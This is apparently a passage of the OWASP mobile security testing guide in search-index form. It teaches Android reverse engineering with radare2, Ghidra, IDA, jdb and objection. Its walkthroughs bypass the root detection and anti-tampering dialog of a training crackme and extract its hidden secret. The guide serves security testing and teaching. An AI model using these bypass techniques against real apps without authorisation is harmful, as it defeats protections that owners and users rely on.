[0x00001760]> aa?\nUsage: aa[0*?] # see also 'af' and 'afna'\n| aa alias for 'af@@ sym.*;af@entry0;afva'\n| aaa[?] autoname functions after aa (see afna)\n| aab abb across bin.sections.rx\n| aac [len] analyze function calls (af @@ `pi len~call[1]`)\n| aac* [len] flag function calls without performing a complete analysis\n| aad [len] analyze data references to code\n| aae [len] ([addr]) analyze references with ESIL (optionally to address)\n| aaf[e|t] analyze all functions (e anal.hasnext=1;afr @@c:isq) (aafe=aef@@f)\n| aaF [sym*] set anal.in=block for all the spaces between flags matching glob\n| aaFa [sym*] same as aaF but uses af/a2f instead of af+/afb+ (slower but more accurate)\n| aai[j] show info of all analysis parameters\n| aan autoname functions that either start with fcn.* or sym.func.*\n| aang find function and symbol names from golang binaries\n| aao analyze all objc references\n| aap find and analyze function preludes\n| aar[?] [len] analyze len bytes of instructions for references\n| aas [len] analyze symbols (af @@= `isq~[0]`)\n| aaS analyze all flags starting with sym. (af @@ sym.*)\n| aat [len] analyze all consecutive functions in section\n| aaT [len] analyze code after trap-sleds\n| aau [len] list mem areas (larger than len bytes) not covered by functions\n| aav [sat] find values referencing a specific section or map\n
There is a thing that is worth noticing about radare2 vs other disassemblers like e.g. IDA Pro. The following quote from this article of radare2's blog (https://radareorg.github.io/blog/) offers a good summary.
Code analysis is not a quick operation, and not even predictable or taking a linear time to be processed. This makes starting times pretty heavy, compared to just loading the headers and strings information like it\u2019s done by default.
People that are used to IDA or Hopper just load the binary, go out to make a coffee and then when the analysis is done, they start doing the manual analysis to understand what the program is doing. It\u2019s true that those tools perform the analysis in background, and the GUI is not blocked. But this takes a lot of CPU time, and r2 aims to run in many more platforms than just high-end desktop computers.
This said, please see section \"Reviewing Disassembled Native Code\" to learn more bout how radare2 can help us performing our reversing tasks much faster. For example, getting the disassembly of a specific function is a trivial task that can be performed in one command.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0018/#ida-pro","title":"IDA Pro","text":"If you own an IDA Pro license, open the file and once in the \"Load new file\" dialog, choose \"ELF for ARM (Shared Object)\" as the file type (IDA should detect this automatically), and \"ARM Little-Endian\" as the processor type.
The freeware version of IDA Pro unfortunately does not support the ARM processor type.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0019/","title":"Retrieving Strings","text":"While performing any kind of binary analysis, strings can be considered as one of the most valuable starting points as they provide context. For example, an error log string like \"Data encryption failed.\" gives us a hint that the adjoining code might be responsible for performing some kind of encryption operation.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0019/#java-and-kotlin-bytecode","title":"Java and Kotlin Bytecode","text":"As we already know, all the Java and Kotlin bytecode of an Android application is compiled into a DEX file. Each DEX file contains a list of string identifiers (strings_ids), which contains all the string identifiers used in the binary whenever a string is referred, including internal naming (e.g, type descriptors) or constant objects referred by the code (e.g hardcoded strings). You can simply dump this list using tools such as Ghidra (GUI based) or Dextra (CLI based).
With Ghidra, strings can be obtained by simply loading the DEX file and selecting Window -> Defined strings in the menu.
Loading an APK file directly into Ghidra might lead to inconsistencies. Thus it is recommended to extract the DEX file by unzipping the APK file and then loading it into Ghidra.
With Dextra, you can dump all the strings using the following command:
dextra -S classes.dex\n
The output from Dextra can be manipulated using standard Linux commands, for example, using grep
to search for certain keywords.
It is important to know, the list of strings obtained using the above tools can be very big, as it also includes the various class and package names used in the application. Going through the complete list, specially for big binaries, can be very cumbersome. Thus, it is recommended to start with keyword-based searching and go through the list only when keyword search does not help. Some generic keywords which can be a good starting point are - password, key, and secret. Other useful keywords specific to the context of the app can be obtained while you are using the app itself. For instance, imagine that the app has as login form, you can take note of the displayed placeholder or title text of the input fields and use that as an entry point for your static analysis.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0019/#native-code","title":"Native Code","text":"In order to extract strings from native code used in an Android application, you can use GUI tools such as Ghidra or iaito or rely on CLI-based tools such as the strings Unix utility (strings <path_to_binary>
) or radare2's rabin2 (rabin2 -zz <path_to_binary>
). When using the CLI-based ones you can take advantage of other tools such as grep (e.g. in conjunction with regular expressions) to further filter and analyze the results.
There are many RE tools that support retrieving Java cross references. For many of the GUI-based ones, this is usually done by right clicking on the desired function and selecting the corresponding option, e.g. Show References to in Ghidra or Find Usage in jadx.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0020/#native-code","title":"Native Code","text":"Similarly to Java analysis, you can also use Ghidra to analyze native libraries and obtain cross references by right clicking the desired function and selecting Show References to.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0021/","title":"Information Gathering - API Usage","text":"The Android platform provides many in-built libraries for frequently used functionalities in applications, for example cryptography, Bluetooth, NFC, network or location libraries. Determining the presence of these libraries in an application can give us valuable information about its nature.
For instance, if an application is importing javax.crypto.Cipher
, it indicates that the application will be performing some kind of cryptographic operation. Fortunately, cryptographic calls are very standard in nature, i.e, they need to be called in a particular order to work correctly, this knowledge can be helpful when analyzing cryptography APIs. For example, by looking for the Cipher.getInstance
function, we can determine the cryptographic algorithm being used. With such an approach we can directly move to analyzing cryptographic assets, which often are very critical in an application. Further information on how to analyze Android's cryptographic APIs is discussed in the section \"Android Cryptographic APIs\".
Similarly, the above approach can be used to determine where and how an application is using NFC. For instance, an application using Host-based Card Emulation for performing digital payments must use the android.nfc
package. Therefore, a good starting point for NFC API analysis would be to consult the Android Developer Documentation to get some ideas and start searching for critical functions such as processCommandApdu
from the android.nfc.cardemulation.HostApduService
class.
Most of the apps you might encounter connect to remote endpoints. Even before you perform any dynamic analysis (e.g. traffic capture and analysis), you can obtain some initial inputs or entry points by enumerating the domains to which the application is supposed to communicate to.
Typically these domains will be present as strings within the binary of the application. One way to achieve this is by using automated tools such as APKEnum or MobSF. Alternatively, you can grep for the domain names by using regular expressions. For this you can target the app binary directly or reverse engineer it and target the disassembled or decompiled code. The latter option has a clear advantage: it can provide you with context, as you'll be able to see in which context each domain is being used (e.g. class and method).
From here on you can use this information to derive more insights which might be of use later during your analysis, e.g. you could match the domains to the pinned certificates or the Network Security Configuration file or perform further reconnaissance on domain names to know more about the target environment. When evaluating an application it is important to check the Network Security Configuration file, as often (less secure) debug configurations might be pushed into final release builds by mistake.
The implementation and verification of secure connections can be an intricate process and there are numerous aspects to consider. For instance, many applications use other protocols apart from HTTP such as XMPP or plain TCP packets, or perform certificate pinning in an attempt to deter MITM attacks but unfortunately have severe logical bugs in its implementation or an inherently wrong security network configuration.
Remember that in most of the cases, just using static analysis will not be enough and might even turn to be extremely inefficient when compared to the dynamic alternatives which will get much more reliable results (e.g. using an interceptor proxy). In this section we've just slightly touched the surface, please refer to the section \"Basic Network Monitoring/Sniffing\" in the \"Android Basic Security Testing\" chapter and also check the test cases in the \"Android Network Communication\" chapter.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0023/","title":"Reviewing Decompiled Java Code","text":"Following the example from \"Decompiling Java Code\", we assume that you've successfully decompiled and opened the UnCrackable App for Android Level 1 in IntelliJ. As soon as IntelliJ has indexed the code, you can browse it just like you'd browse any other Java project. Note that many of the decompiled packages, classes, and methods have weird one-letter names; this is because the bytecode has been \"minified\" with ProGuard at build time. This is a basic type of obfuscation that makes the bytecode a little more difficult to read, but with a fairly simple app like this one, it won't cause you much of a headache. When you're analyzing a more complex app, however, it can get quite annoying.
When analyzing obfuscated code, annotating class names, method names, and other identifiers as you go along is a good practice. Open the MainActivity
class in the package sg.vantagepoint.uncrackable1
. The method verify
is called when you tap the \"verify\" button. This method passes the user input to a static method called a.a
, which returns a boolean value. It seems plausible that a.a
verifies user input, so we'll refactor the code to reflect this.
Right-click the class name (the first a
in a.a
) and select Refactor -> Rename from the drop-down menu (or press Shift-F6). Change the class name to something that makes more sense given what you know about the class so far. For example, you could call it \"Validator\" (you can always revise the name later). a.a
now becomes Validator.a
. Follow the same procedure to rename the static method a
to check_input
.
Congratulations, you just learned the fundamentals of static analysis! It is all about theorizing, annotating, and gradually revising theories about the analyzed program until you understand it completely or, at least, well enough for whatever you want to achieve.
Next, Ctrl+click (or Command+click on Mac) on the check_input
method. This takes you to the method definition. The decompiled method looks like this:
public static boolean check_input(String string) {\n byte[] arrby = Base64.decode((String) \\\n \"5UJiFctbmgbDoLXmpL12mkno8HT4Lv8dlat8FxR2GOc=\", (int)0);\n byte[] arrby2 = new byte[]{};\n try {\n arrby = sg.vantagepoint.a.a.a(Validator.b(\"8d127684cbc37c17616d806cf50473cc\"), arrby);\n arrby2 = arrby;\n }sa\n catch (Exception exception) {\n Log.d((String)\"CodeCheck\", (String)(\"AES error:\" + exception.getMessage()));\n }\n if (string.equals(new String(arrby2))) {\n return true;\n }\n return false;\n }\n
So, you have a Base64-encoded String that's passed to the function a
in the package \\ sg.vantagepoint.a.a
(again, everything is called a
) along with something that looks suspiciously like a hex-encoded encryption key (16 hex bytes = 128bit, a common key length). What exactly does this particular a
do? Ctrl-click it to find out.
public class a {\n public static byte[] a(byte[] object, byte[] arrby) {\n object = new SecretKeySpec((byte[])object, \"AES/ECB/PKCS7Padding\");\n Cipher cipher = Cipher.getInstance(\"AES\");\n cipher.init(2, (Key)object);\n return cipher.doFinal(arrby);\n }\n}\n
Now you're getting somewhere: it's simply standard AES-ECB. Looks like the Base64 string stored in arrby1
in check_input
is a ciphertext. It is decrypted with 128bit AES, then compared with the user input. As a bonus task, try to decrypt the extracted ciphertext and find the secret value!
A faster way to get the decrypted string is to add dynamic analysis. We'll revisit UnCrackable App for Android Level 1 later to show how (e.g. in the Debugging section), so don't delete the project yet!
"},{"location":"MASTG/techniques/android/MASTG-TECH-0024/","title":"Reviewing Disassembled Native Code","text":"Following the example from \"Disassembling Native Code\" we will use different disassemblers to review the disassembled native code.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0024/#radare2","title":"radare2","text":"Once you've opened your file in radare2 you should first get the address of the function you're looking for. You can do this by listing or getting information i
about the symbols s
(is
) and grepping (~
radare2's built-in grep) for some keyword, in our case we're looking for JNI related symbols so we enter \"Java\":
$ r2 -A HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so\n...\n[0x00000e3c]> is~Java\n003 0x00000e78 0x00000e78 GLOBAL FUNC 16 Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI\n
The method can be found at address 0x00000e78
. To display its disassembly simply run the following commands:
[0x00000e3c]> e emu.str=true;\n[0x00000e3c]> s 0x00000e78\n[0x00000e78]> af\n[0x00000e78]> pdf\n\u256d (fcn) sym.Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI 12\n\u2502 sym.Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI (int32_t arg1);\n\u2502 ; arg int32_t arg1 @ r0\n\u2502 0x00000e78 ~ 0268 ldr r2, [r0] ; arg1\n\u2502 ;-- aav.0x00000e79:\n\u2502 ; UNKNOWN XREF from aav.0x00000189 (+0x3)\n\u2502 0x00000e79 unaligned\n\u2502 0x00000e7a 0249 ldr r1, aav.0x00000f3c ; [0xe84:4]=0xf3c aav.0x00000f3c\n\u2502 0x00000e7c d2f89c22 ldr.w r2, [r2, 0x29c]\n\u2502 0x00000e80 7944 add r1, pc ; \"Hello from C++\" section..rodata\n\u2570 0x00000e82 1047 bx r2\n
Let's explain the previous commands:
e emu.str=true;
enables radare2's string emulation. Thanks to this, we can see the string we're looking for (\"Hello from C++\").s 0x00000e78
is a seek to the address s 0x00000e78
, where our target function is located. We do this so that the following commands apply to this address.pdf
means print disassembly of function.Using radare2 you can quickly run commands and exit by using the flags -qc '<commands>'
. From the previous steps we know already what to do so we will simply put everything together:
$ r2 -qc 'e emu.str=true; s 0x00000e78; af; pdf' HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so\n\n\u256d (fcn) sym.Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI 12\n\u2502 sym.Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI (int32_t arg1);\n\u2502 ; arg int32_t arg1 @ r0\n\u2502 0x00000e78 0268 ldr r2, [r0] ; arg1\n\u2502 0x00000e7a 0249 ldr r1, [0x00000e84] ; [0xe84:4]=0xf3c\n\u2502 0x00000e7c d2f89c22 ldr.w r2, [r2, 0x29c]\n\u2502 0x00000e80 7944 add r1, pc ; \"Hello from C++\" section..rodata\n\u2570 0x00000e82 1047 bx r2\n
Notice that in this case we're not starting with the -A
flag not running aaa
. Instead, we just tell radare2 to analyze that one function by using the analyze function af
command. This is one of those cases where we can speed up our workflow because you're focusing on some specific part of an app.
The workflow can be further improved by using r2ghidra, a deep integration of Ghidra decompiler for radare2. r2ghidra generates decompiled C code, which can aid in quickly analyzing the binary.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0024/#ida-pro","title":"IDA Pro","text":"We assume that you've successfully opened lib/armeabi-v7a/libnative-lib.so
in IDA pro. Once the file is loaded, click into the \"Functions\" window on the left and press Alt+t
to open the search dialog. Enter \"java\" and hit enter. This should highlight the Java_sg_vantagepoint_helloworld_ MainActivity_stringFromJNI
function. Double-click the function to jump to its address in the disassembly Window. \"Ida View-A\" should now show the disassembly of the function.
Not a lot of code there, but you should analyze it. The first thing you need to know is that the first argument passed to every JNI function is a JNI interface pointer. An interface pointer is a pointer to a pointer. This pointer points to a function table: an array of even more pointers, each of which points to a JNI interface function (is your head spinning yet?). The function table is initialized by the Java VM and allows the native function to interact with the Java environment.
With that in mind, let's have a look at each line of assembly code.
LDR R2, [R0]\n
Remember: the first argument (in R0) is a pointer to the JNI function table pointer. The LDR
instruction loads this function table pointer into R2.
LDR R1, =aHelloFromC\n
This instruction loads into R1 the PC-relative offset of the string \"Hello from C++\". Note that this string comes directly after the end of the function block at offset 0xe84. Addressing relative to the program counter allows the code to run independently of its position in memory.
LDR.W R2, [R2, #0x29C]\n
This instruction loads the function pointer from offset 0x29C into the JNI function pointer table pointed to by R2. This is the NewStringUTF
function. You can look at the list of function pointers in jni.h, which is included in the Android NDK. The function prototype looks like this:
jstring (*NewStringUTF)(JNIEnv*, const char*);\n
The function takes two arguments: the JNIEnv pointer (already in R0) and a String pointer. Next, the current value of PC is added to R1, resulting in the absolute address of the static string \"Hello from C++\" (PC + offset).
ADD R1, PC\n
Finally, the program executes a branch instruction to the NewStringUTF
function pointer loaded into R2:
BX R2\n
When this function returns, R0 contains a pointer to the newly constructed UTF string. This is the final return value, so R0 is left unchanged and the function returns.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0024/#ghidra","title":"Ghidra","text":"After opening the library in Ghidra we can see all the functions defined in the Symbol Tree panel under Functions. The native library for the current application is relatively very small. There are three user defined functions: FUN_001004d0
, FUN_0010051c
, and Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI
. The other symbols are not user defined and are generated for proper functioning of the shared library. The instructions in the function Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI
are already discussed in detail in previous sections. In this section we can look into the decompilation of the function.
Inside the current function there is a call to another function, whose address is obtained by accessing an offset in the JNIEnv
pointer (found as plParm1
). This logic has been diagrammatically demonstrated above as well. The corresponding C code for the disassembled function is shown in the Decompiler window. This decompiled C code makes it much easier to understand the function call being made. Since this function is small and extremely simple, the decompilation output is very accurate, this can change drastically when dealing with complex functions.
You should use tools for efficient static analysis. They allow the tester to focus on the more complicated business logic. A plethora of static code analyzers are available, ranging from open source scanners to full-blown enterprise-ready scanners. The best tool for the job depends on budget, client requirements, and the tester's preferences.
Some static analyzers rely on the availability of the source code; others take the compiled APK as input. Keep in mind that static analyzers may not be able to find all problems by themselves even though they can help us focus on potential problems. Review each finding carefully and try to understand what the app is doing to improve your chances of finding vulnerabilities.
Configure the static analyzer properly to reduce the likelihood of false positives and maybe only select several vulnerability categories in the scan. The results generated by static analyzers can otherwise be overwhelming, and your efforts can be counterproductive if you must manually investigate a large report.
There are several open source tools for automated security analysis of an APK.
Non-rooted devices have the benefit of replicating an environment that the application is intended to run on.
Thanks to tools like objection, you can patch the app in order to test it like if you were on a rooted device (but of course being jailed to that one app). To do that you have to perform one additional step: patch the APK to include the Frida gadget library.
Now you can use objection to dynamically analyze the application on non-rooted devices.
The following commands summarize how to patch and start dynamic analysis using objection using the UnCrackable App for Android Level 1 as an example:
# Download the Uncrackable APK\n$ wget https://raw.githubusercontent.com/OWASP/owasp-mastg/master/Crackmes/Android/Level_01/UnCrackable-Level1.apk\n# Patch the APK with the Frida Gadget\n$ objection patchapk --source UnCrackable-Level1.apk\n# Install the patched APK on the android phone\n$ adb install UnCrackable-Level1.objection.apk\n# After running the mobile phone, objection will detect the running frida-server through the APK\n$ objection explore\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0027/","title":"Get Open Files","text":"You can use lsof
with the flag -p <pid>
to return the list of open files for the specified process. See the man page for more options.
# lsof -p 6233\nCOMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME\n.foobar.c 6233 u0_a97 cwd DIR 0,1 0 1 /\n.foobar.c 6233 u0_a97 rtd DIR 0,1 0 1 /\n.foobar.c 6233 u0_a97 txt REG 259,11 23968 399 /system/bin/app_process64\n.foobar.c 6233 u0_a97 mem unknown /dev/ashmem/dalvik-main space (region space) (deleted)\n.foobar.c 6233 u0_a97 mem REG 253,0 2797568 1146914 /data/dalvik-cache/arm64/system@framework@boot.art\n.foobar.c 6233 u0_a97 mem REG 253,0 1081344 1146915 /data/dalvik-cache/arm64/system@framework@boot-core-libart.art\n...\n
In the above output, the most relevant fields for us are:
NAME
: path of the file.TYPE
: type of the file, for example, file is a directory or a regular file.This can be extremely useful to spot unusual files when monitoring applications using obfuscation or other anti-reverse engineering techniques, without having to reverse the code. For instance, an application might be performing encryption-decryption of data and storing it in a file temporarily.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0028/","title":"Get Open Connections","text":"You can find system-wide networking information in /proc/net
or just by inspecting the /proc/<pid>/net
directories (for some reason not process specific). There are multiple files present in these directories, of which tcp
, tcp6
and udp
might be considered relevant from the tester's perspective.
# cat /proc/7254/net/tcp\nsl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode\n...\n69: 1101A8C0:BB2F 9A447D4A:01BB 01 00000000:00000000 00:00000000 00000000 10093 0 75412 1 0000000000000000 20 3 19 10 -1\n70: 1101A8C0:917C E3CB3AD8:01BB 01 00000000:00000000 00:00000000 00000000 10093 0 75553 1 0000000000000000 20 3 23 10 -1\n71: 1101A8C0:C1E3 9C187D4A:01BB 01 00000000:00000000 00:00000000 00000000 10093 0 75458 1 0000000000000000 20 3 19 10 -1\n...\n
In the output above, the most relevant fields for us are:
rem_address
: remote address and port number pair (in hexadecimal representation).tx_queue
and rx_queue
: the outgoing and incoming data queue in terms of kernel memory usage. These fields give an indication how actively the connection is being used.uid
: containing the effective UID of the creator of the socket.Another alternative is to use the netstat
command, which also provides information about the network activity for the complete system in a more readable format, and can be easily filtered as per our requirements. For instance, we can easily filter it by PID:
# netstat -p | grep 24685\nActive Internet connections (w/o servers)\nProto Recv-Q Send-Q Local Address Foreign Address State PID/Program Name\ntcp 0 0 192.168.1.17:47368 172.217.194.103:https CLOSE_WAIT 24685/com.google.android.youtube\ntcp 0 0 192.168.1.17:47233 172.217.194.94:https CLOSE_WAIT 24685/com.google.android.youtube\ntcp 0 0 192.168.1.17:38480 sc-in-f100.1e100.:https ESTABLISHED 24685/com.google.android.youtube\ntcp 0 0 192.168.1.17:44833 74.125.24.91:https ESTABLISHED 24685/com.google.android.youtube\ntcp 0 0 192.168.1.17:38481 sc-in-f100.1e100.:https ESTABLISHED 24685/com.google.android.youtube\n...\n
netstat
output is clearly more user friendly than reading /proc/<pid>/net
. The most relevant fields for us, similar to the previous output, are following:
Foreign Address
: remote address and port number pair (port number can be replaced with the well-known name of a protocol associated with the port).Recv-Q
and Send-Q
: Statistics related to receive and send queue. Gives an indication on how actively the connection is being used.State
: the state of a socket, for example, if the socket is in active use (ESTABLISHED
) or closed (CLOSED
).The file /proc/<pid>/maps
contains the currently mapped memory regions and their access permissions. Using this file we can get the list of the libraries loaded in the process.
# cat /proc/9568/maps\n12c00000-52c00000 rw-p 00000000 00:04 14917 /dev/ashmem/dalvik-main space (region space) (deleted)\n6f019000-6f2c0000 rw-p 00000000 fd:00 1146914 /data/dalvik-cache/arm64/system@framework@boot.art\n...\n7327670000-7329747000 r--p 00000000 fd:00 1884627 /data/app/com.google.android.gms-4FJbDh-oZv-5bCw39jkIMQ==/oat/arm64/base.odex\n..\n733494d000-7334cfb000 r-xp 00000000 fd:00 1884542 /data/app/com.google.android.youtube-Rl_hl9LptFQf3Vf-JJReGw==/lib/arm64/libcronet.80.0.3970.3.so\n...\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0029/#using-frida","title":"Using Frida","text":"You can retrieve process related information straight from the Frida CLI by using the Process
command. Within the Process
command the function enumerateModules
lists the libraries loaded into the process memory.
[Huawei Nexus 6P::sg.vantagepoint.helloworldjni]-> Process.enumerateModules()\n[\n {\n \"base\": \"0x558a442000\",\n \"name\": \"app_process64\",\n \"path\": \"/system/bin/app_process64\",\n \"size\": 32768\n },\n {\n \"base\": \"0x78bc984000\",\n \"name\": \"libandroid_runtime.so\",\n \"path\": \"/system/lib64/libandroid_runtime.so\",\n \"size\": 2011136\n },\n...\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0030/","title":"Sandbox Inspection","text":"The application data is stored in a sandboxed directory present at /data/data/<app_package_name>
. The content of this directory has already been discussed in detail in the \"Accessing App Data Directories\" section.
So far, you've been using static analysis techniques without running the target apps. In the real world, especially when reversing malware or more complex apps, pure static analysis is very difficult. Observing and manipulating an app during runtime makes it much, much easier to decipher its behavior. Next, we'll have a look at dynamic analysis methods that help you do just that.
Android apps support two different types of debugging: Debugging on the level of the Java runtime with the Java Debug Wire Protocol (JDWP), and Linux/Unix-style ptrace-based debugging on the native layer, both of which are valuable to reverse engineers.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0031/#debugging-release-apps","title":"Debugging Release Apps","text":"Dalvik and ART support the JDWP, a protocol for communication between the debugger and the Java virtual machine (VM) that it debugs. JDWP is a standard debugging protocol that's supported by all command line tools and Java IDEs, including jdb, IntelliJ, and Eclipse. Android's implementation of JDWP also includes hooks for supporting extra features implemented by the Dalvik Debug Monitor Server (DDMS).
A JDWP debugger allows you to step through Java code, set breakpoints on Java methods, and inspect and modify local and instance variables. You'll use a JDWP debugger most of the time you debug \"normal\" Android apps (i.e., apps that don't make many calls to native libraries).
In the following section, we'll show how to solve the UnCrackable App for Android Level 1 with jdb alone. Note that this is not an efficient way to solve this crackme. Actually you can do it much faster with Frida and other methods, which we'll introduce later in the guide. This, however, serves as an introduction to the capabilities of the Java debugger.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0031/#debugging-with-jdb","title":"Debugging with jdb","text":"The adb
command line tool was introduced in the \"Android Basic Security Testing\" chapter. You can use its adb jdwp
command to list the process IDs of all debuggable processes running on the connected device (i.e., processes hosting a JDWP transport). With the adb forward
command, you can open a listening socket on your host computer and forward this socket's incoming TCP connections to the JDWP transport of a chosen process.
$ adb jdwp\n12167\n$ adb forward tcp:7777 jdwp:12167\n
You're now ready to attach jdb. Attaching the debugger, however, causes the app to resume, which you don't want. You want to keep it suspended so that you can explore first. To prevent the process from resuming, pipe the suspend
command into jdb:
$ { echo \"suspend\"; cat; } | jdb -attach localhost:7777\nInitializing jdb ...\n> All threads suspended.\n>\n
You're now attached to the suspended process and ready to go ahead with the jdb commands. Entering ?
prints the complete list of commands. Unfortunately, the Android VM doesn't support all available JDWP features. For example, the redefine
command, which would let you redefine a class code is not supported. Another important restriction is that line breakpoints won't work because the release bytecode doesn't contain line information. Method breakpoints do work, however. Useful working commands include:
Let's revisit the decompiled code from the UnCrackable App for Android Level 1 and think about possible solutions. A good approach would be suspending the app in a state where the secret string is held in a variable in plain text so you can retrieve it. Unfortunately, you won't get that far unless you deal with the root/tampering detection first.
Review the code and you'll see that the method sg.vantagepoint.uncrackable1.MainActivity.a
displays the \"This in unacceptable...\" message box. This method creates an AlertDialog
and sets a listener class for the onClick
event. This class (named b
) has a callback method will terminates the app once the user taps the OK button. To prevent the user from simply canceling the dialog, the setCancelable
method is called.
private void a(final String title) {\n final AlertDialog create = new AlertDialog$Builder((Context)this).create();\n create.setTitle((CharSequence)title);\n create.setMessage((CharSequence)\"This in unacceptable. The app is now going to exit.\");\n create.setButton(-3, (CharSequence)\"OK\", (DialogInterface$OnClickListener)new b(this));\n create.setCancelable(false);\n create.show();\n }\n
You can bypass this with a little runtime tampering. With the app still suspended, set a method breakpoint on android.app.Dialog.setCancelable
and resume the app.
> stop in android.app.Dialog.setCancelable\nSet breakpoint android.app.Dialog.setCancelable\n> resume\nAll threads resumed.\n>\nBreakpoint hit: \"thread=main\", android.app.Dialog.setCancelable(), line=1,110 bci=0\nmain[1]\n
The app is now suspended at the first instruction of the setCancelable
method. You can print the arguments passed to setCancelable
with the locals
command (the arguments are shown incorrectly under \"local variables\").
main[1] locals\nMethod arguments:\nLocal variables:\nflag = true\n
setCancelable(true)
was called, so this can't be the call we're looking for. Resume the process with the resume
command.
main[1] resume\nBreakpoint hit: \"thread=main\", android.app.Dialog.setCancelable(), line=1,110 bci=0\nmain[1] locals\nflag = false\n
You've now reached a call to setCancelable
with the argument false
. Set the variable to true
with the set
command and resume.
main[1] set flag = true\n flag = true = true\nmain[1] resume\n
Repeat this process, setting flag
to true
each time the breakpoint is reached, until the alert box is finally displayed (the breakpoint will be reached five or six times). The alert box should now be cancelable! Tap the screen next to the box and it will close without terminating the app.
Now that the anti-tampering is out of the way, you're ready to extract the secret string! In the \"static analysis\" section, you saw that the string is decrypted with AES, then compared with the string input to the message box. The method equals
of the java.lang.String
class compares the string input with the secret string. Set a method breakpoint on java.lang.String.equals
, enter an arbitrary text string in the edit field, and tap the \"verify\" button. Once the breakpoint is reached, you can read the method argument with the locals
command.
> stop in java.lang.String.equals\nSet breakpoint java.lang.String.equals\n>\nBreakpoint hit: \"thread=main\", java.lang.String.equals(), line=639 bci=2\n\nmain[1] locals\nMethod arguments:\nLocal variables:\nother = \"radiusGravity\"\nmain[1] cont\n\nBreakpoint hit: \"thread=main\", java.lang.String.equals(), line=639 bci=2\n\nmain[1] locals\nMethod arguments:\nLocal variables:\nother = \"I want to believe\"\nmain[1] cont\n
This is the plaintext string you're looking for!
"},{"location":"MASTG/techniques/android/MASTG-TECH-0031/#debugging-with-an-ide","title":"Debugging with an IDE","text":"Setting up a project in an IDE with the decompiled sources is a neat trick that allows you to set method breakpoints directly in the source code. In most cases, you should be able to single-step through the app and inspect the state of variables with the GUI. The experience won't be perfect, it's not the original source code after all, so you won't be able to set line breakpoints and things will sometimes simply not work correctly. Then again, reversing code is never easy, and efficiently navigating and debugging plain old Java code is a pretty convenient way of doing it. A similar method has been described in the NetSPI blog.
To set up IDE debugging, first create your Android project in IntelliJ and copy the decompiled Java sources into the source folder as described above in the \"Reviewing Decompiled Java Code\" section. On the device, choose the app as debug app on the \"Developer options\" (UnCrackable App for Android Level 1 in this tutorial), and make sure you've switched on the \"Wait For Debugger\" feature.
Once you tap the app icon from the launcher, it will be suspended in \"Wait For Debugger\" mode.
Now you can set breakpoints and attach to the app process with the \"Attach Debugger\" toolbar button.
Note that only method breakpoints work when debugging an app from decompiled sources. Once a method breakpoint is reached, you'll get the chance to single step during the method execution.
After you choose the app from the list, the debugger will attach to the app process and you'll reach the breakpoint that was set on the onCreate
method. This app triggers anti-debugging and anti-tampering controls within the onCreate
method. That's why setting a breakpoint on the onCreate
method just before the anti-tampering and anti-debugging checks are performed is a good idea.
Next, single-step through the onCreate
method by clicking \"Force Step Into\" in Debugger view. The \"Force Step Into\" option allows you to debug the Android framework functions and core Java classes that are normally ignored by debuggers.
Once you \"Force Step Into\", the debugger will stop at the beginning of the next method, which is the a
method of the class sg.vantagepoint.a.c
.
This method searches for the \"su\" binary within a list of directories (/system/xbin
and others). Since you're running the app on a rooted device/emulator, you need to defeat this check by manipulating variables and/or function return values.
You can see the directory names inside the \"Variables\" window by clicking \"Step Over\" the Debugger view to step into and through the a
method.
Step into the System.getenv
method with the \"Force Step Into\" feature.
After you get the colon-separated directory names, the debugger cursor will return to the beginning of the a
method, not to the next executable line. This happens because you're working on the decompiled code instead of the source code. This skipping makes following the code flow crucial to debugging decompiled applications. Otherwise, identifying the next line to be executed would become complicated.
If you don't want to debug core Java and Android classes, you can step out of the function by clicking \"Step Out\" in the Debugger view. Using \"Force Step Into\" might be a good idea once you reach the decompiled sources and \"Step Out\" of the core Java and Android classes. This will help speed up debugging while you keep an eye on the return values of the core class functions.
After the a
method gets the directory names, it will search for the su
binary within these directories. To defeat this check, step through the detection method and inspect the variable content. Once execution reaches a location where the su
binary would be detected, modify one of the variables holding the file name or directory name by pressing F2 or right-clicking and choosing \"Set Value\".
Once you modify the binary name or the directory name, File.exists
should return false
.
This defeats the first root detection control of the app. The remaining anti-tampering and anti-debugging controls can be defeated in similar ways so that you can finally reach the secret string verification functionality.
The secret code is verified by the method a
of class sg.vantagepoint.uncrackable1.a
. Set a breakpoint on method a
and \"Force Step Into\" when you reach the breakpoint. Then, single-step until you reach the call to String.equals
. This is where user input is compared with the secret string.
You can see the secret string in the \"Variables\" view when you reach the String.equals
method call.
Native code on Android is packed into ELF shared libraries and runs just like any other native Linux program. Consequently, you can debug it with standard tools (including GDB and built-in IDE debuggers such as IDA Pro) as long as they support the device's processor architecture (most devices are based on ARM chipsets, so this is usually not an issue).
You'll now set up your JNI demo app, HelloWorld-JNI.apk, for debugging. It's the same APK you downloaded in \"Statically Analyzing Native Code\". Use adb install
to install it on your device or on an emulator.
adb install HelloWorld-JNI.apk\n
If you followed the instructions at the beginning of this chapter, you should already have the Android NDK. It contains prebuilt versions of gdbserver for various architectures. Copy the gdbserver binary to your device:
